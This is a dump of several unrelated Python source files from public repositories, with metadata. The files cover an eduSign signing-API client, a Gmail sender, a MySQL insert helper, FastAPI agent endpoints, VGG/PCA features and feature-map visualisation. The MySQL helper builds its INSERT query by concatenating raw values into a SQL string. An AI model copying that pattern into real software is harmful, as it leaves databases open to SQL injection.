Initialize the client object with configuration gathered by flask.\n We need 3 parameters here:\n\n + The base URL of the signature service / API\n + The profile in the API to use - for which we have credentials (HTTP Basic Auth)\n + The HTTP Basic Auth credentials.\n\n :param config: Dict containing the configuration parameters provided to Flask.\n \"\"\"\n self.api_base_url = config['EDUSIGN_API_BASE_URL']\n self.profile = config['EDUSIGN_API_PROFILE']\n self.basic_auth = HTTPBasicAuth(config['EDUSIGN_API_USERNAME'], config['EDUSIGN_API_PASSWORD'])\n self.config = config\n\n def _post(self, url: str, request_data: dict) -> dict:\n \"\"\"\n Method to POST to the eduSign API, used by all methods of the class\n that POST to it.\n\n :param url: URL to send the POST to\n :param request_data: Dict holding the data to POST.\n :return: Flask representation of the HTTP response from the API.\n \"\"\"\n requests_session = requests.Session()\n req = requests.Request('POST', url, json=request_data, auth=self.basic_auth)\n prepped = requests_session.prepare_request(req)\n\n current_app.logger.debug(f\"Request sent to the API's {url} method: {pretty_print_req(prepped)}\")\n\n settings = requests_session.merge_environment_settings(prepped.url, {}, None, None, None)\n response = requests_session.send(prepped, **settings)\n current_app.logger.debug(f\"Response from the API's {url} method: {response}\")\n return response.json()\n\n def prepare_document(self, document: dict) -> dict:\n \"\"\"\n Send request to the `prepare` endpoint of the API.\n This API method will prepare a PDF document\n with a PDF signature page containing a visible PDF signature image,\n and keep it cached for 15min by default.\n\n The main pieces of data we have to send to this endpoint are:\n\n * pdfDocument: The PDF document as base64 data.\n\n * signaturePagePreferences.visiblePdfSignatureUserInformation.signerName.signerAttributes:\n The list of attributes to be used in the signature, given as `{name: }` objects.\n These are attributes released by the SAML IdP, and their name must be in uri format.\n\n * signaturePagePreferences.visiblePdfSignatureUserInformation.fieldValues.idp:\n The value of this field will appear in the signature image as the \"Authenticated by\" entity.\n We here try to provide the organization name as provided by Shibboleth, and in case it is not\n found, the entityID of the IdP chosen by the user. Note that the client (the flask app)\n will try to identify the user via seamlessaccess.org, and it will record the IdP chosen by\n the user to use it here.\n\n There are other parameters to control the insertion of the signature image in the document,\n which we've just valued as suggested in [1].\n\n The structure of the JSON to send would be something like:\n\n .. code:\n {\n \"pdfDocument\": \"JVBERi0xLj...lJUVPRgo=\",\n \"signaturePagePreferences\": {\n \"visiblePdfSignatureUserInformation\": {\n \"signerName\": {\"signerAttributes\": [ {\"name\" : \"urn:oid:2.16.840.1.113730.3.1.241\"} ]},\n \"fieldValues\": {\"idp\": \"Snake Oil Co\"},\n },\n \"failWhenSignPageFull\": true,\n \"insertPageAt\": 0,\n \"returnDocumentReference\": true,\n },\n }\n\n :param document: Dict holding the PDF (data and metadata) to prepare for signing.\n :return: Flask representation of the HTTP response from the API.\n \"\"\"\n idp = session['idp']\n if self.config['ENVIRONMENT'] == 'development':\n # This is only to test the app in a development environment.\n idp = self.config['DEBUG_IDP']\n\n if session.get('organizationName', None) is not None:\n idp = session['organizationName']\n\n attrs = [{'name': attr} for attr in self.config['SIGNER_ATTRIBUTES'].keys()]\n current_app.logger.debug(f\"signerAttributes sent to the prepare endpoint: {attrs}\")\n\n doc_data = document['blob']\n if ',' in doc_data:\n doc_data = doc_data.split(',')[1]\n\n request_data = {\n \"pdfDocument\": doc_data,\n \"signaturePagePreferences\": {\n \"visiblePdfSignatureUserInformation\": {\n \"signerName\": {\"signerAttributes\": attrs},\n \"fieldValues\": {\"idp\": idp},\n },\n \"failWhenSignPageFull\": True,\n \"insertPageAt\": 0,\n \"returnDocumentReference\": True,\n },\n }\n api_url = urljoin(self.api_base_url, f'prepare/{self.profile}')\n\n response = self._post(api_url, request_data)\n\n if current_app.logger.level == 'DEBUG':\n tolog = response.copy()\n for doc in tolog['signedDocuments']:\n doc['signedContent'] = doc['signedContent'][:20] + '...'\n current_app.logger.debug(f\"Data returned from the API's prepare endpoint: {pformat(tolog)}\")\n\n return response\n\n def _try_creating_sign_request(self, documents: list, add_blob=False) -> tuple:\n \"\"\"\n Send request to the `create` endpoint of the API.\n This API method is used to create a sign request that can then be POSTed\n to the signature service, to initiate the actual signing process.\n\n It will include references to all the already prepared documents that\n need to be signed, kept in the API's cache.\n\n The main pieces of data we have to send to this endpoint are:\n\n + correlationId: A unique identifier for this request to create a sign request.\n\n + signRequesterID: is the SAML entityID of the SAML SP that authenticated the user,\n and who is the requesting entity of the signature operation. It has to coincide with\n whatever has been configured in the signature service.\n\n + returnUrl: The URL of the callback endpoint in the client, to which the user\n will be redirected after completing the signature process at the sign service.\n\n + authnRequirements.authnServiceID: entityID of the IdP that will perform the authentication\n for signature.\n\n + authnRequirements.authnContextClassRefs: The AuthnContextClassRef URI(s) that we request\n that the user is authenticated under.\n\n + authnRequirements.requestedSignerAttributes: A list of SAML attributes and values.\n It is necessary to provide values for all atributes previously sent as signerAttributes\n to the `prepare` endpoint.\n\n + tbsDocuments: A list in which each item carries metadata about one the documents to be signed.\n The metadata is as follows:\n\n + tbsDocuments.N.id: A unique identifier for the document issued by the client.\n\n + tbsDocuments.N.contentReference: This value was in the response from the API to the call\n to the `prepare` endpoint, as `updatedPdfDocumentReference`.\n\n + tbsDocuments.N.mimeType: application/pdf\n\n + tbsDocuments.N.visiblePdfSignatureRequirement: This was also in the response from the API\n to the call to the `prepare` endpoint.\n\n So the structure of the JSON to send would be something like:\n\n {\n \"correlationId\": \"11111111-1111-1111-1111-111111111111\",\n \"signRequesterID\": \"https://example.org/shibboleth\",\n \"returnUrl\": \"https://example.org/callback\",\n \"authnRequirements\": {\n \"authnServiceID\": \"https://idp.example.org/shibboleth\",\n \"authnContextClassRefs\": [ \"http://id.elegnamnden.se/loa/1.0/loa3\" ],\n \"requestedSignerAttributes\": [\n {\n \"name\": \"urn:oid:2.16.840.1.113730.3.1.241\",\n \"value\": \"John Doe\",\n }\n ],\n },\n \"tbsDocuments\": [],\n }\n\n And each itme in `tbsDocuments` would have the structure:\n\n {\n \"id\": \"22222222-2222-2222-2222-222222222222\",\n \"contentReference\": \"33333333-3333-3333-3333-333333333333\",\n \"mimeType\": \"application/pdf\",\n \"visiblePdfSignatureRequirement\": { \"...\" },\n }\n\n :param documents: List with (already prepared) documents to include in the sign request.\n :return: Pair of Flask representation of the HTTP response from the API,\n and list of mappings linking the documents' names with the generated ids.\n \"\"\"\n idp = session['idp']\n if self.config['ENVIRONMENT'] == 'development':\n idp = self.config['DEBUG_IDP']\n\n authn_context = get_authn_context(documents)\n\n correlation_id = str(uuid.uuid4())\n return_url = url_for('edusign.sign_service_callback', _external=True, _scheme='https')\n attrs = [{'name': attr, 'value': session[name]} for attr, name in self.config['SIGNER_ATTRIBUTES'].items()]\n\n request_data = {\n \"correlationId\": correlation_id,\n \"signRequesterID\": self.config['SIGN_REQUESTER_ID'],\n \"returnUrl\": return_url,\n \"authnRequirements\": {\n \"authnServiceID\": idp,\n \"authnContextClassRefs\": authn_context,\n \"requestedSignerAttributes\": attrs,\n },\n \"tbsDocuments\": [],\n }\n documents_with_id = []\n for document in documents:\n doc_with_id = {'name': document['name'], 'key': str(document['key'])}\n if add_blob:\n doc_with_id['blob'] = document['blob']\n doc_with_id['size'] = document['size']\n doc_with_id['size'] = document['size']\n doc_with_id['type'] = document['type']\n documents_with_id.append(doc_with_id)\n request_data['tbsDocuments'].append(\n {\n \"id\": str(document['key']),\n \"contentReference\": document['ref'],\n \"mimeType\": document['type'],\n \"visiblePdfSignatureRequirement\": json.loads(document['sign_requirement']),\n }\n )\n api_url = urljoin(self.api_base_url, f'create/{self.profile}')\n\n return self._post(api_url, request_data), documents_with_id\n\n def create_sign_request(self, documents: list, add_blob=False) -> tuple:\n \"\"\"\n Use the `_try_creating_sign_request` method to create a sign request\n at the `create` endpoint of the API.\n\n It is possible that the documents referenced in the requests have been cleared from\n the API's cache; in that case, the response from the API will have an error code\n indicating that condition. This method will then raise an `ExpiredCache` eception,\n and it is the responsability of the calling method to restart the process: Send the\n documents again to be prepared, and then try again to create a sign request.\n\n If successful, this method will return the response with the sign request, to be POSTed\n from the user agent to initiate the actual signing of the document.\n\n :param documents: List with (already prepared) documents to include in the sign request.\n :raises ExpiredCache: When the response from the API indicates that the documents to sign\n have dissapeared from the API's cache.\n :return: Data (with the sign request) contained in the response from the API,\n and a list of mappings linking the documents' names with the generated ids (sent to\n the API as tbsDocuments.N.id).\n \"\"\"\n response_data, documents_with_id = self._try_creating_sign_request(documents, add_blob=add_blob)\n\n if (\n 'status' in response_data\n and response_data['status'] == 400\n and 'message' in response_data\n and 'not found in cache' in response_data['message']\n ):\n\n raise self.ExpiredCache()\n\n if current_app.logger.level == 'DEBUG':\n tolog = response_data.copy()\n tolog['signRequest'] = tolog['signRequest'][:20] + '...'\n current_app.logger.debug(f\"Data returned from the API's create endpoint: {pformat(tolog)}\")\n\n return response_data, documents_with_id\n\n def process_sign_request(self, sign_response: dict, relay_state: str) -> requests.Response:\n \"\"\"\n This method is meant to be called after the user has completed the sgnature process, through the\n sign service and the IdP. At this point, the documents are signed and kept in the API's cache.\n So here we send a request to the `proccess` endpoint of the API to retrieve them.\n\n The main pieces of data we have to send to this endpoint are:\n\n + signResponse\n + realyState\n + state\n\n The values for these are all present in the POST that the user agent sends to the callback in the client app\n (whose URL we sent to the `create` endpoint as `returnUrl`), after returning from the sign service and IdP.\n\n The reponse to this call will contain, in addition to some more metadata, the signed documents, in a list\n `signedDocuments`, where each document includes:\n\n + id: the id of the document, sent to the `create` endpoint as tbsDocuments.N.id;\n + signedContent: The signed document encoded as base64;\n + mimeType: \"application/pdf\"\n\n Send request to the `process` endpoint of the API.\n This API method will process the DSS SignRequest in order to get the signed document.\n\n :param sign_response: signResponse data as returned from the `create` endpoint of the eduSign API.\n :param relay_state: Relay state as returned from the `create` endpoint of the eduSign API.\n :return: Data (containing the signed documents in successful requests) received in the HTTP response\n from the API.\n \"\"\"\n request_data = {\"signResponse\": sign_response, \"relayState\": relay_state, \"state\": {\"id\": relay_state}}\n api_url = urljoin(self.api_base_url, 'process')\n\n response = self._post(api_url, request_data)\n\n if current_app.logger.level == 'DEBUG':\n tolog = response.copy()\n for doc in tolog['signedDocuments']:\n doc['signedContent'] = doc['signedContent'][:20] + '...'\n current_app.logger.debug(f\"Data returned from the API's process endpoint: {pformat(tolog)}\")\n\n return response\n","repo_name":"SUNET/edusign-app","sub_path":"backend/src/edusign_webapp/api_client.py","file_name":"api_client.py","file_ext":"py","file_size_in_byte":16468,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
+{"seq_id":"26121963505","text":"__author__ = 'hungtantran'\r\n\r\n\r\nimport httplib2\r\nimport os\r\nimport base64\r\nfrom email.mime.text import MIMEText\r\n\r\nfrom apiclient import discovery\r\nimport oauth2client\r\nfrom oauth2client import client\r\nfrom oauth2client import tools\r\n\r\nfrom constants_config import Config\r\nimport logger\r\n\r\ntry:\r\n import argparse\r\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\r\nexcept ImportError:\r\n flags = None\r\n\r\n\r\nclass GmailClient(object):\r\n SCOPES = 'https://www.googleapis.com/auth/gmail.modify'\r\n APPLICATION_NAME = 'gmail_client'\r\n\r\n def __init__(self, secret_json, user_id):\r\n self.secret_json = secret_json\r\n self.user_id = user_id\r\n\r\n credentials = self.get_credentials(secret_json)\r\n http = credentials.authorize(httplib2.Http())\r\n self.service = discovery.build('gmail', 'v1', http=http)\r\n\r\n def get_credentials(self, secret_json):\r\n \"\"\"Gets valid user credentials from storage.\r\n\r\n If nothing has been stored, or if the stored credentials are invalid,\r\n the OAuth2 flow is completed to obtain the new credentials.\r\n\r\n Returns:\r\n Credentials, the obtained credential.\r\n \"\"\"\r\n credential_dir = os.path.join('.credentials')\r\n if not os.path.exists(credential_dir):\r\n os.makedirs(credential_dir)\r\n credential_path = os.path.join(credential_dir, 'secret.json')\r\n\r\n store = oauth2client.file.Storage(credential_path)\r\n credentials = store.get()\r\n if not credentials or credentials.invalid:\r\n flow = client.flow_from_clientsecrets(secret_json, GmailClient.SCOPES)\r\n flow.user_agent = GmailClient.APPLICATION_NAME\r\n if flags:\r\n credentials = tools.run_flow(flow, store, flags)\r\n else: # Needed only for compatibility with Python 2.6\r\n credentials = tools.run(flow, store)\r\n return credentials\r\n\r\n def CreateMessage(self, content, subject, toLine, ccLine=None, bccLine=None):\r\n \"\"\"Create a message for an email.\r\n\r\n Args:\r\n sender: Email address of the sender.\r\n to: Email address of the receiver.\r\n subject: The subject of the email message.\r\n message_text: The text of the email message.\r\n\r\n Returns:\r\n An object containing a base64url encoded email object.\r\n \"\"\"\r\n message = MIMEText(content)\r\n message['to'] = toLine\r\n\r\n if ccLine is not None:\r\n message['cc'] = ccLine\r\n\r\n if bccLine is not None:\r\n message['bcc'] = bccLine\r\n\r\n message['from'] = Config.gmail_client_userid\r\n message['subject'] = subject\r\n return {'raw': base64.urlsafe_b64encode(message.as_string())}\r\n\r\n def send_mail(self, content, subject, toLine, ccLine=None, bccLine=None):\r\n \"\"\"Send an email message.\r\n\r\n Args:\r\n service: Authorized Gmail API service instance.\r\n user_id: User's email address. The special value \"me\"\r\n can be used to indicate the authenticated user.\r\n message: Message to be sent.\r\n\r\n Returns:\r\n Sent Message.\r\n \"\"\"\r\n try:\r\n logger.Logger.log(logger.LogLevel.INFO, 'Try sending message with subject %s to %s' % (subject, toLine))\r\n message = self.CreateMessage(content, subject, toLine, ccLine, bccLine)\r\n message = (self.service.users().messages().send(userId=self.user_id,\r\n body=message).execute())\r\n logger.Logger.log(logger.LogLevel.INFO, 'Sent message id: %s' % message['id'])\r\n return message\r\n except Exception as e:\r\n logger.Logger.log(logger.LogLevel.ERROR, e)\r\n\r\n\r\n","repo_name":"hungtantran/Findata","sub_path":"Common/gmail_client.py","file_name":"gmail_client.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"1373699957","text":"import random\nfrom color import color\nclass RandomColor():\n def __init__(self, screen_array):\n self.screen_array = screen_array\n\n def randomColor(self):\n return color(random.randint(0, 2), random.randint(0, 2), random.randint(0, 2))\n\n def randomColorFill(self, x, y, x2, y2,types='two_ang'):\n if types == 'two_ang':\n for i in range(x2-x):\n for j in range(y2-y):\n self.screen_array[i+x][j+y] = self.randomColor()\n if types == 'one_ang':\n for i in range(x2):\n for j in range(y2):\n self.screen_array[i+x][j+y] = self.randomColor()\n\n def randomOneColorFill(self, x, y, x2, y2,types='two_ang'):\n random_color = self.randomColor()\n if types == 'two_ang':\n for i in range(x2-x):\n for j in range(y2-y):\n self.screen_array[i+x][j+y] = random_color\n if types == 'one_ang':\n for i in range(x2):\n for j in range(y2):\n self.screen_array[i+x][j+y] = random_color","repo_name":"lllzebralll/TGL","sub_path":"randomColor.py","file_name":"randomColor.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"40057820614","text":"from query_builder import QueryBuilder\nfrom connect_mysql import Conexao\nfrom mysql.connector import Error\n\nclass Inserir(QueryBuilder):\n def __init__(self,table,data):\n super().__init__(table,data)\n self.conn = Conexao()\n\n def _sql(self):\n key = self._dados_chave()\n valor = self._dados_valores()\n campos = \",\".join(key)\n valores = \"','\".join(valor)\n sql = \"INSERT INTO \" + self._tabela + \" (\" + campos + \") VALUES ('\" + valores + \"');\"\n\n return sql\n\n def get(self):\n try:\n sql = self._sql()\n conn = self.conn.connection()\n cursor = conn.cursor()\n cursor.execute(sql)\n conn.commit()\n print(f'{cursor.rowcount} linha(s) afetada(s)')\n cursor.close()\n except Error as erro:\n print(f'Falha ao inserir dados ao banco {erro}')\n finally:\n if (conn.is_connected()):\n conn.close()\n print(\"conexao finalizada\")","repo_name":"wellz3280/estudos-python","sub_path":"query_builder/inserir.py","file_name":"inserir.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"34022533848","text":"from asgiref.sync import sync_to_async\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db.models import Q\nfrom fastapi import HTTPException, APIRouter, Depends\nfrom typing import Optional\nfrom pydantic import BaseModel\nfrom uuid import UUID\nfrom ix.agents.models import Agent\nfrom ix.api.auth import get_request_user\nfrom ix.api.chains.endpoints import DeletedItem\nfrom ix.api.agents.types import Agent as AgentPydantic, AgentPage\n\n__all__ = [\"router\", \"AgentCreateUpdate\"]\n\n\nrouter = APIRouter()\n\n\nclass AgentCreateUpdate(BaseModel):\n name: str\n alias: str\n purpose: str\n chain_id: UUID\n model: str = \"gpt-4\"\n config: dict = {}\n\n\n@router.post(\"/agents/\", response_model=AgentPydantic, tags=[\"Agents\"])\nasync def create_agent(\n agent: AgentCreateUpdate, user: AbstractUser = Depends(get_request_user)\n):\n agent_obj = Agent(user=user, **agent.dict())\n await agent_obj.asave()\n return AgentPydantic.from_orm(agent_obj)\n\n\n@router.get(\"/agents/{agent_id}\", response_model=AgentPydantic, tags=[\"Agents\"])\nasync def get_agent(agent_id: str, user: AbstractUser = Depends(get_request_user)):\n try:\n query = Agent.objects.filter(pk=agent_id)\n agent = await Agent.filter_owners(user, query).aget()\n except Agent.DoesNotExist:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n return AgentPydantic.from_orm(agent)\n\n\n@router.get(\"/agents/\", response_model=AgentPage, tags=[\"Agents\"])\nasync def get_agents(\n search: Optional[str] = None,\n chat_id: Optional[UUID] = None,\n limit: int = 10,\n offset: int = 0,\n user: AbstractUser = Depends(get_request_user),\n):\n query = Agent.objects.filter(is_test=False).order_by(\"alias\")\n query = Agent.filter_owners(user, query)\n if chat_id:\n query = query.filter(chats__id=chat_id)\n if search:\n query = query.filter(Q(name__icontains=search) | Q(alias__icontains=search))\n\n # punting on async implementation of pagination until later\n return await sync_to_async(AgentPage.paginate)(\n output_model=AgentPydantic, queryset=query, limit=limit, offset=offset\n )\n\n\n@router.put(\"/agents/{agent_id}\", response_model=AgentPydantic, tags=[\"Agents\"])\nasync def update_agent(\n agent_id: str,\n agent: AgentCreateUpdate,\n user: AbstractUser = Depends(get_request_user),\n):\n try:\n query = Agent.objects.filter(pk=agent_id)\n agent_obj = await Agent.filter_owners(user, query).aget()\n except Agent.DoesNotExist:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n for attr, value in agent.dict().items():\n setattr(agent_obj, attr, value)\n await agent_obj.asave()\n return agent_obj\n\n\n@router.delete(\"/agents/{agent_id}\", response_model=DeletedItem, tags=[\"Agents\"])\nasync def delete_agent(agent_id: str, user: AbstractUser = Depends(get_request_user)):\n try:\n query = Agent.objects.filter(pk=agent_id)\n agent = await Agent.filter_owners(user, query).aget()\n except Agent.DoesNotExist:\n raise HTTPException(status_code=404, detail=\"Agent not found\")\n await agent.adelete()\n return DeletedItem(id=agent_id)\n","repo_name":"kreneskyp/ix","sub_path":"ix/api/agents/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":809,"dataset":"github-code","pt":"18"}
+{"seq_id":"29908103607","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# coding:utf-8\n\nimport numpy as np\nimport cv2 as cv\ntry:\n import cPickle as pickle\nexcept ModuleNotFoundError:\n import _pickle as pickle\nfrom chainer import cuda\nfrom chainer import Variable\n\n\ndef vggparamater(image, gpu, vgg): # image:str(path to image file) gpu:number(gpu-id)\n\n mean = np.array([103.939, 116.779, 123.68])\n img = cv.imread(image).astype(np.float32)\n img -= mean\n img = cv.resize(img, (224, 224)).transpose((2, 0, 1))\n img = img[np.newaxis, :, :, :]\n\n if gpu >= 0:\n cuda.get_device(gpu).use()\n vgg.to_gpu()\n img = cuda.cupy.asarray(img, dtype=np.float32)\n\n pred = vgg(Variable(img), None)\n\n if gpu >= 0:\n pred = cuda.to_cpu(pred.data)\n else:\n pred = pred.data\n\n with open('pca.pickle', mode='rb') as f:\n pca = pickle.load(f, encoding='latin1')\n\n result = pca.transform(pred)\n\n # PCAmean = np.load('PCAmean.npy')\n # PCAeigen = np.load('PCAeigen.npy')\n\n # result = cv2.PCAProject(pred,PCAmean,PCAeigen)\n\n # print np.shape(result)\n return result\n # return pred\n","repo_name":"sugiya-y/StyleTransferWords","sub_path":"arbitrary_image_stylization_word/vggparam.py","file_name":"vggparam.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"26911717909","text":"import torch\nimport cv2\nimport numpy as np\nimport torch.nn.functional as F\nimport os\nimport os.path as osp\n\n_COLORS = np.array(\n [\n 0.000, 0.447, 0.741,\n 0.850, 0.325, 0.098,\n 0.929, 0.694, 0.125,\n 0.494, 0.184, 0.556,\n 0.466, 0.674, 0.188,\n 0.301, 0.745, 0.933,\n 0.635, 0.078, 0.184,\n 0.300, 0.300, 0.300,\n 1.000, 0.667, 0.500,\n 1.000, 1.000, 0.500,\n 0.000, 0.333, 1.000,\n 0.000, 0.667, 1.000,\n 0.000, 1.000, 1.000,\n 0.333, 0.000, 1.000,\n 0.333, 0.333, 1.000,\n 0.333, 0.667, 1.000,\n 0.333, 1.000, 1.000,\n 0.667, 0.000, 1.000,\n 0.667, 0.333, 1.000\n ]\n).astype(np.float32).reshape(-1, 3)\n\ndef get_names_dict(model):\n \"\"\"Recursive walk to get names including path.\"\"\"\n names = {}\n\n def _get_names(module, parent_name=\"\"):\n for key, m in module.named_children():\n cls_name = str(m.__class__).split(\".\")[-1].split(\"'\")[0]\n num_named_children = len(list(m.named_children()))\n if num_named_children > 0:\n name = parent_name + \".\" + key if parent_name else key\n else:\n name = parent_name + \".\" + cls_name + \"_\" + key if parent_name else key\n names[name] = m\n\n if isinstance(m, torch.nn.Module):\n _get_names(m, parent_name=name)\n\n _get_names(model)\n return names\n\ndef show_img(imgs, window_names=None, wait_time_ms=0, is_merge=False, row_col_num=(1, -1)):\n \"\"\"\n Displays an image or a list of images in specified windows or self-initiated windows.\n You can also control display wait time by parameter 'wait_time_ms'.\n Additionally, this function provides an optional parameter 'is_merge' to\n decide whether to display all imgs in a particular window 'merge'.\n Besides, parameter 'row_col_num' supports user specified merge format.\n Notice, specified format must be greater than or equal to imgs number.\n\n :param imgs: numpy.ndarray or list.\n :param window_names: specified or None, if None, function will create different windows as '1', '2'.\n :param wait_time_ms: display wait time.\n :param is_merge: whether to merge all images.\n :param row_col_num: merge format. default is (1, -1), image will line up to show.\n example=(2, 5), images will display in two rows and five columns.\n \"\"\"\n if not isinstance(imgs, list):\n imgs = [imgs]\n\n if window_names is None:\n window_names = list(range(len(imgs)))\n else:\n if not isinstance(window_names, list):\n window_names = [window_names]\n assert len(imgs) == len(window_names), 'window names does not match images!'\n\n if is_merge:\n merge_imgs1 = merge_imgs(imgs, row_col_num)\n\n cv2.namedWindow('merge', 0)\n cv2.imshow('merge', merge_imgs1)\n else:\n for img, win_name in zip(imgs, window_names):\n if img is None:\n continue\n win_name = str(win_name)\n cv2.namedWindow(win_name, 0)\n cv2.imshow(win_name, img)\n\n cv2.waitKey(wait_time_ms)\n\ndef merge_imgs(imgs, row_col_num):\n \"\"\"\n Merges all input images as an image with specified merge format.\n\n :param imgs : img list\n :param row_col_num : number of rows and columns displayed\n :return img : merges img\n \"\"\"\n\n length = len(imgs)\n row, col = row_col_num\n\n assert row > 0 or col > 0, 'row and col cannot be negative at same time!'\n color = random_color(rgb=True).astype(np.float64)\n\n for img in imgs:\n cv2.rectangle(img, (0, 0), (img.shape[1], img.shape[0]), color)\n\n if row_col_num[1] < 0 or length < row:\n merge_imgs = np.hstack(imgs)\n elif row_col_num[0] < 0 or length < col:\n merge_imgs = np.vstack(imgs)\n else:\n assert row * col >= length, 'Imgs overboundary, not enough windows to display all imgs!'\n\n fill_img_list = [np.zeros(imgs[0].shape, dtype=np.uint8)] * (row * col - length)\n imgs.extend(fill_img_list)\n merge_imgs_col = []\n for i in range(row):\n start = col * i\n end = col * (i + 1)\n merge_col = np.hstack(imgs[start: end])\n merge_imgs_col.append(merge_col)\n\n merge_imgs = np.vstack(merge_imgs_col)\n\n return merge_imgs\n\ndef show_tensor(tensor, resize_hw=None, top_k=50, mode='CHW', is_show=True,\n wait_time_ms=0, show_split=True, is_merge=True, row_col_num=(1, -1)):\n \"\"\"\n\n :param wait_time_ms:\n :param tensor: torch.tensor\n :param resize_hw: list:\n :param top_k: int\n :param mode: string: 'CHW' , 'HWC'\n \"\"\"\n\n def normalize_numpy(array):\n max_value = np.max(array)\n min_value = np.min(array)\n array = (array - min_value) / (max_value - min_value)\n return array\n\n assert tensor.dim() == 3, 'Dim of input tensor should be 3, please check your tensor dimension!'\n\n # 默认tensor格式,通道在前\n if mode == 'CHW':\n tensor = tensor\n else:\n tensor = tensor.permute(2, 0, 1)\n\n # 利用torch中的resize函数进行插值, 选择双线性插值平滑\n if resize_hw is not None:\n tensor = tensor[None]\n tensor = F.interpolate(tensor, resize_hw, mode='bilinear')\n tensor = tensor.squeeze(0)\n\n tensor = tensor.permute(1, 2, 0)\n\n channel = tensor.shape[2]\n\n if tensor.device == 'cpu':\n tensor = tensor.detach().numpy()\n else:\n tensor = tensor.cpu().detach().numpy()\n if not show_split:\n # sum可能会越界,所以需要归一化\n sum_tensor = np.sum(tensor, axis=2)\n sum_tensor = normalize_numpy(sum_tensor) * 255\n sum_tensor = sum_tensor.astype(np.uint8)\n\n # 热力图显示\n sum_tensor = cv2.applyColorMap(np.uint8(sum_tensor), cv2.COLORMAP_JET)\n # mean_tensor = cv2.applyColorMap(np.uint8(mean_tensor), cv2.COLORMAP_JET)\n\n if is_show:\n show_img([sum_tensor], ['sum'], wait_time_ms=wait_time_ms)\n return [sum_tensor]\n else:\n assert top_k > 0, 'top k should be positive!'\n channel_sum = np.sum(tensor, axis=(0, 1))\n index = np.argsort(channel_sum)\n select_index = index[:top_k]\n tensor = tensor[:, :, select_index]\n tensor = np.clip(tensor, 0, np.max(tensor))\n\n single_tensor_list = []\n if top_k > channel:\n top_k = channel\n for c in range(top_k):\n single_tensor = tensor[..., c]\n single_tensor = normalize_numpy(single_tensor) * 255\n single_tensor = single_tensor.astype(np.uint8)\n\n single_tensor = cv2.applyColorMap(np.uint8(single_tensor), cv2.COLORMAP_JET)\n single_tensor_list.append(single_tensor)\n\n if is_merge:\n return_imgs = merge_imgs(single_tensor_list, row_col_num=row_col_num)\n else:\n return_imgs = single_tensor_list\n\n if is_show:\n show_img(return_imgs, wait_time_ms=wait_time_ms, is_merge=is_merge)\n return return_imgs\n\ndef random_color(rgb=False, maximum=255):\n \"\"\"\n Args:\n rgb (bool): whether to return RGB colors or BGR colors.\n maximum (int): either 255 or 1\n\n Returns:\n ndarray: a vector of 3 numbers\n \"\"\"\n idx = np.random.randint(0, len(_COLORS))\n ret = _COLORS[idx] * maximum\n if not rgb:\n ret = ret[::-1]\n return ret\n\ndef imdenormalize(img, mean, std, to_bgr=True):\n assert img.dtype != np.uint8\n mean = mean.reshape(1, -1).astype(np.float64)\n std = std.reshape(1, -1).astype(np.float64)\n img = cv2.multiply(img, std) # make a copy\n cv2.add(img, mean, img) # inplace\n if to_bgr:\n cv2.cvtColor(img, cv2.COLOR_RGB2BGR, img) # inplace\n return img\n\ndef imwrite(img, file_path, params=None, auto_mkdir=True):\n \"\"\"Write image to file.\n\n Args:\n img (ndarray): Image array to be written.\n file_path (str): Image file path.\n params (None or list): Same as opencv's :func:`imwrite` interface.\n auto_mkdir (bool): If the parent folder of `file_path` does not exist,\n whether to create it automatically.\n\n Returns:\n bool: Successful or not.\n \"\"\"\n if auto_mkdir:\n dir_name = osp.abspath(osp.dirname(file_path))\n mkdir_or_exist(dir_name)\n return cv2.imwrite(file_path, img, params)\n\ndef mkdir_or_exist(dir_name, mode=0o777):\n if dir_name == '':\n return\n dir_name = osp.expanduser(dir_name)\n os.makedirs(dir_name, mode=mode, exist_ok=True)\n\ndef traverse_file_paths(path, extensions, exclude_extensions=None):\n \"\"\"\n Recursively reads all files under given folder, until all files have been ergodic.\n You can also specified file extensions to read or not to read.\n :return: list: path_list contains all wanted files.\n \"\"\"\n\n def is_valid_file(x):\n if exclude_extensions is None:\n return x.lower().endswith(extensions)\n else:\n return x.lower().endswith(extensions) and not x.lower().endswith(exclude_extensions)\n\n # check_file_exist(path)\n if isinstance(extensions, list):\n extensions = tuple(extensions)\n if isinstance(exclude_extensions, list):\n exclude_extensions = tuple(exclude_extensions)\n\n all_list = os.listdir(path)\n path_list = []\n for subpath in all_list:\n path_next = os.path.join(path, subpath)\n if os.path.isdir(path_next):\n path_list.extend(traverse_file_paths(path_next, extensions, exclude_extensions))\n else:\n if is_valid_file(path_next):\n path_list.append(path_next)\n return path_list","repo_name":"HUST-OROP/CopperDefect","sub_path":"utils/tools/feature_map_visual/mmdet_mini/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9776,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"}
